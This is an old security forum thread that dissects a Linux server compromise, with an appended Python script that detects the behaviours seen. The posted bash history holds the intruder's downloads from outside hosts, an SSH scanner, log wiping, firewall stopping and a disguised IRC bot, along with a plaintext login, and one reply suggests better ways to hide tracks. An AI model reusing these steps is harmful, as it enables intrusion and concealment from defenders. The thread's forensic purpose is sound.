Full Version: Owned
uko
Sorry for the long post...

One of my friend's Linux servers was hacked a day ago. He passed the bash history on to me. Some will find it boring, others might find it interesting as I did. There's one interesting thing to note though; the bash history was rm'd yet it still exists??? The last few lines are my friend performing forensics.

w
cd tmp
cd /tmp
wget www.ei-gei.go.ro/bk.tar.gz
tar zxvf bk.tar.gz
rm -rf bk.tar.gz
cd bk
./install
w
cd /home
ls
cd /dev/shm
ls
wget www.ei-gei.go.ro/scan.tar
tar zxvf scan.tar
rm -rf scan.tar
cd ssh
rm -rf bios.txt uniq.txt vuln.txt
./ss 22 -a 204 -s 10
killall -9 ss
rm -rf .bash_history
rm -rf /var/run/utmp
rm -rf /var/run/wtmp -
rm -rf /var/log/lastlog
rm -rf /usr/adm/lastlog
rm -rf .bash_history
cd /var/log/
rm -rf wtmp
rm -rf secure
rm -rf lastlog
rm -rf messages
touch messagess
touch wtmp
touch secure
touch lastlog
cd /root
rm -rf .bash_history
touch .bash_history
exit
uptime
cat /etc/hosts
passwd
wget
tar
wget
cd /tmp
wget ww.ei-gei.go.ro/php.tgz
wget ww.ei-gei.go.ro/php.tgzls
ls -a
rm -rf no_user.phtml
wget www.asterix-obelix.net/php.tgz
tar -zxvf php.tgz
rm -rf php.tgz
cd ssh
./ss 22 -a 192 -s 10
./ss 22 -a 192 -s 10
cd /tmp
cd ssh
rm -rf *.txt
/ss 22 -a 192 -s 10
./ss 22 -a 192 -s 10
cd ..
cd var/log
ls
rm -rf lastlog
uptime
ps -ax
kil -9 1652 1653
kill -9 1652 1653
ps -ax
cd ..
cd lib
ls
mkdir .isso
c .isso
cd .isso
ls
cat /proc/cpuinfo
cat /etc/hosts
cat /etc/issue
cat /etc/issue
ls
wget www.asterix-obelix.net/mech.tgz
tar -zxvf mech.tgz
ls -a
rm -rf mech.tgz .a
wget www.asterix-obelix.net/mech.tgz
tar -zxvf mech.tgz
ls
rm -rf mech.tgz .a
ls
ls -a
cd/tmp
cd /vat/lib/.isso
cd ...
cd ..
cd var/lib
cd .isso
wget www.asterix-obelix.net/mech.tgz
cd ..
cd var/log
ls -a
cd /tmp/ssh
ls
./ss 22 -a 192 -s 10
./ss 22 -a 192 -s 10
cd ..
cd var/lib
cd .isso
ls
tar -zxvf mech.tgz
cd .a
ls
mv mech crond
export PATH="."
crond
crond
crond
cd ..
cd lib
ls -a
ps -ax
kill -9 9525 9526 9527 9528 9529 9530 9531
ps -ax
mkdir .isso
cd .isso
wget www.asterix-obelix.net/mech.tgz
tar -zxvf mech.tgz
rm -rf mech.tgz
cd .a
ls
mv mech crond
export PATH="."
crond
crond
service iptables start
cat /etc/hosts
ls
service iptables stop
cd ..
ps -ax
kill -9 5890
cd var/lib/isso
ls
ls -a
cd .a
ls
service iptables stop
export PATH="."
crond
ls
ps -ax
service iptables start
service iptables start
service iptables start
service iptables stop
service iptables start
cd ..
cd var/log
ls -a
cd ..
cd lib/isso
ls
ls -a
cd .a
ps -ax
cd ..
rm -rf .a
wget www.musketari.com/psybnc.tgz
tar -zxvf psybnc.tgz
rm -rf psybnc.tgz
cd psybnc
ls
mv psybnc crond
ls
service iptables
service iptables stop
export PATH="."
crond
cat /etc/hosts
vhost
ls
ps -ax
kill -9 6430
ls
cd flood
ls
./pingflood
cd ..
ls
cd scripts
ls
cd ..
cd ..
cd var/lib/isso
l
sls
ls
rm -rf psybnc
wget www.musketari.com/psybnc.tgz
tar -zxvf psybnc.tgz
rm -rf psybnc.tgz
cd psybnc
ls
mv psybnc crond
service iptables stop
export PATH="."
crond
cd ..
cd var/lib
ls
cd /lib
rm -rf .isso
cd /var/lib
ls -a
rm -rf .isso
cat /etc/issue
cat /etc/hosts
vhost
ls
ps -ax
kill -9 1900
mkdir isso
cd isso
wget www.musketari.com/psybnc.tgz
tar -zxvf psybnc.tgz
cd psybnc.tgz
cd psybnc
ls
mv psybnc crond
ls
export PATH="."
crond
ps -ax
service iptables stop
ls
cd ..
cd var/log/isso
ccd var/lib/isso
cd var/lib/isso
ls
ps -ax
rm -rf 5890
ls
rm -rf psybnc psybnc.tgz
wget www.asterix-obelix.net/mech/tgz
wget www.asterix-obelix.net/mech.tgz
tar -zxvf mech.tgz
mr -rf mech.tgz
rm -rf .a
tar -zxvf mech.tgz
rm -rf mech.tgz
cd .a
ls
mv mech crond
export PATH="."
crond
cd ..
service iptables stop
cd ..
cd var/lib/isso
cd psybnc
ls
export PATH="."
crond
cat /etc/hosts
mysql intranet
mysql intranet_users
telnet localhost 143
telnet localhost 143
mysql intranet_users
mysql intranet_users
su admin
whois
whois -p
whois -v
users
ls
cd ..
ls
usr
cd usr/
ls
cd bin/
ls
cd ..
ls
cd man
ls
cd ..
cd local/
ls
exit
telnet localhost 143
a9 LOGIN admin MaGibd4A
telnet localhost 143
telnet localhost 143
ifconfig
route -n
cd /opt/applications/
ls
cd intranet
ls
cd main
wget http://www.realvnc.com/dist/vnc-4.0-x86_win32.exe
mv vnc-4.0-x86_win32.exe vnc.exe
vi a.html
rm a.html
exit
mc
cat .bash_history
lesst .bash_history
less .bash_history
mc
df -h
dmesg
ifconfig
netstat

How was the box compromised?!?!? root password "password"
Gurou
If the box was fully patched, I think it was compromised using an SSH bruteforcer or an include/SQL injection vulnerability.

the kiddy installed an IRC bot (EnergyMech) and a backdoor.

Can you upload these files here on the forum:
www.ei-gei.go.ro/bk.tar.gz
www.ei-gei.go.ro/scan.tar
www.ei-gei.go.ro/php.tgz

The server seems to be down.
bjoernfun
Hrm, it looks like an auto hacker script, 'cause the kiddy downloaded a Windows version of VNC!
amnesia
QUOTE(bjoernfun @ Nov 16 2004, 07:19 PM)
Hrm, it looks like an auto hacker script, 'cause the kiddy downloaded a Windows version of VNC!
*



You might want to read my analysis at:
http://www.security.org.sg/gtec/honeynet/v...?diary=20041105

The techniques used are similar.

As for vnc.exe, the attacker probably used his newly 0wn3d box as a repository for his/her next attack attempts.
amnesia
QUOTE(Gurou @ Nov 16 2004, 06:55 PM)
If the box was fully patched, I think it was compromised using an SSH bruteforcer or an include/SQL injection vulnerability.

the kiddy installed an IRC bot (EnergyMech) and a backdoor.

Can you upload these files here on the forum:
www.ei-gei.go.ro/bk.tar.gz
www.ei-gei.go.ro/scan.tar
www.ei-gei.go.ro/php.tgz

The server seems to be down.
*



All three should refer to the same thing as what you mentioned (i.e. brutessh variant).
Dany_Mello
It is a very interesting post; it seems obvious that a backdoor is installed, but what is the utility of the scan.tar program and the command ./ss 22 -a 192 -s 10?
What is the purpose of this?

Thanks!
nightcall
Can anyone believe that the brutessh2.c author took the time to hardcode 2000 calls to

checkauth("root", "somepasswordhere", buff);

And he says "feel free to add more passwords and more users :=)"

Wouldn't it be more effective to have the program read in usernames and passwords to try from a file given in the command line arguments?

Even here our kiddie demonstrates knowledge of how to use command line arguments in his ./ssh command, so I don't think that would have gone over his head.

Also, our kiddie does not seem to understand that the bash shell writes commands from the current shell session to $HOME/.bash_history when the user logs out. It doesn't matter that he obliterated the .bash_history; his current session will be appended to it once he exits his shell.

He needs to add
rm .bash_history
to his $HOME/.bash_logout
file, so it will be run once the shell is closed, or better yet,
just fill the file up with inconspicuous commands like ls, mv, cp, pine, elm, ps
so it looks like nothing weird has happened.

-nc-
roxi
QUOTE(amnesia @ Nov 16 2004, 12:09 PM)
QUOTE(Gurou @ Nov 16 2004, 06:55 PM)
If the box was fully patched, I think it was compromised using an SSH bruteforcer or an include/SQL injection vulnerability.

the kiddy installed an IRC bot (EnergyMech) and a backdoor.

Can you upload these files here on the forum:
www.ei-gei.go.ro/bk.tar.gz
www.ei-gei.go.ro/scan.tar
www.ei-gei.go.ro/php.tgz

The server seems to be down.
*



All three should refer to the same thing as what you mentioned (i.e. brutessh variant).
*


The php.tgz you can download from www.asterix-obelix.net/php.tgz

and the ./ss 22 -a 192 -s 10 is from php.tgz; download it and you will see.
amnesia
QUOTE(roxi @ Nov 17 2004, 08:33 PM)
QUOTE(amnesia @ Nov 16 2004, 12:09 PM)
QUOTE(Gurou @ Nov 16 2004, 06:55 PM)
If the box was fully patched, I think it was compromised using an SSH bruteforcer or an include/SQL injection vulnerability.

the kiddy installed an IRC bot (EnergyMech) and a backdoor.

Can you upload these files here on the forum:
www.ei-gei.go.ro/bk.tar.gz
www.ei-gei.go.ro/scan.tar
www.ei-gei.go.ro/php.tgz

The server seems to be down.
*



All three should refer to the same thing as what you mentioned (i.e. brutessh variant).
*


The php.tgz you can download from www.asterix-obelix.net/php.tgz

and the ./ss 22 -a 192 -s 10 is from php.tgz; download it and you will see.
*



Quite surprised that no one seems to bother to read my analysis (see link above), in which I gave a walkthrough of how the tools are used. Perhaps someone else can share with us some analysis done on other recent compromises.
Dany_Mello

Yes, sorry amnesia, I have read your analysis. Very interesting, thanks a lot!
LiquidIce
Interesting little read/topic, thanks.
strasharo
Romanian ./script kiddies strike again.
uko
QUOTE(strasharo @ Nov 22 2004, 12:17 AM)
Romanian ./script kiddies strike again.
*



Well done, I wasn't sure if anyone would pick up that it was a Romanian script kiddie. According to my friend he was actually connecting from a Romanian IP as well. He port scanned him back but he was gone!

Unfortunately I don't have those individual files for Gurou. The box was wiped before pulling them off. If you check that site it should be back up anyway.

As for a forensic analysis of what actually happened, I don't have it. My friend hasn't given me an update on what he found yet. I can tell you though that the box was hacked within three days of being put online.
strasharo
Heh, only a quick look at the history is enough to understand that this is a typical Romanian 1337 k1dd13. Have seen so many like this... bored. Like one of my friends said
QUOTE
If you do a
grep "./" .bash_history | wc -l
on a .ro history file the value that is returned doesn't even fit in an integer.

Well, that's all folks, have a nice day!
crackie
QUOTE(Dany_Mello @ Nov 16 2004, 02:33 PM)
It is a very interesting post; it seems obvious that a backdoor is installed, but what is the utility of the scan.tar program and the command ./ss 22 -a 192 -s 10?
What is the purpose of this?

Thanks!
*



^^ ./ss 22 (SSH port) -a 192 (range to scan, 192.x.x.x) -s (threads maybe, dunno)

greetz crackie
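The thread's own analysis (nightcall on how bash appends the session to .bash_history at logout, crackie on the ./ss scanner arguments) is the kind of thing a responder wants to pull out of a recovered history automatically. The script below is an added example written for this page, not code from the thread or from any of the tools it names: it runs a handful of triage rules over a constructed sample copied from the posted history and flags the log wipe, the re-created log files, the binary renamed to crond, the PATH="." trick and the iptables stop. The rule labels and the anti_forensics_suspected heuristic are hypothetical names chosen here.

```python
import re
from collections import Counter

# Constructed sample: a few lines copied from the history posted above (not the full file).
SAMPLE_HISTORY = """\
cd /tmp
wget www.ei-gei.go.ro/bk.tar.gz
cd /dev/shm
./ss 22 -a 204 -s 10
rm -rf .bash_history
rm -rf /var/log/lastlog
touch wtmp
mv mech crond
export PATH="."
service iptables stop
ls
"""

# One rule per behaviour visible in the thread's history; labels are hypothetical.
RULES = [
    ("remote_fetch", re.compile(r"^\s*(wget|curl)\b")),
    ("staging_dir", re.compile(r"^\s*cd\s+(/tmp|/dev/shm)\b")),
    ("log_wipe", re.compile(r"^\s*rm\s+-rf\s+\S*(\.bash_history|/var/log|utmp|wtmp|lastlog|secure|messages)\b")),
    ("log_recreate", re.compile(r"^\s*touch\s+(wtmp|secure|lastlog|messages|\.bash_history)\b")),
    ("masquerade", re.compile(r"^\s*mv\s+\S+\s+crond\s*$")),          # tool renamed to a daemon name
    ("path_dot", re.compile(r'^\s*export\s+PATH=["\']?\.["\']?\s*$')),  # run "crond" from the cwd
    ("firewall_off", re.compile(r"^\s*service\s+iptables\s+stop\b")),
    ("mass_scanner", re.compile(r"^\s*\.?/?ss\s+\d+\s+-a\s+\d+")),     # ./ss <port> -a <class A> ...
]

def triage(history):
    """Return (hits, counts); hits is a list of (line_no, label, line)."""
    hits = []
    for no, line in enumerate(history.splitlines(), 1):
        for label, rx in RULES:
            if rx.search(line):
                hits.append((no, label, line))
    return hits, Counter(label for _, label, _ in hits)

def anti_forensics_suspected(counts):
    """Wipe-then-recreate of log files is the pattern seen in the posted history."""
    return counts["log_wipe"] > 0 and counts["log_recreate"] > 0

if __name__ == "__main__":
    hits, counts = triage(SAMPLE_HISTORY)
    for no, label, line in hits:
        print(f"{no:4d} {label:<13} {line}")
    print(dict(counts), "anti-forensics:", anti_forensics_suspected(counts))
```

Because bash only writes the session out at exit, the file a responder recovers covers the attacker's whole last session, which is why the rm'd history on this box still existed.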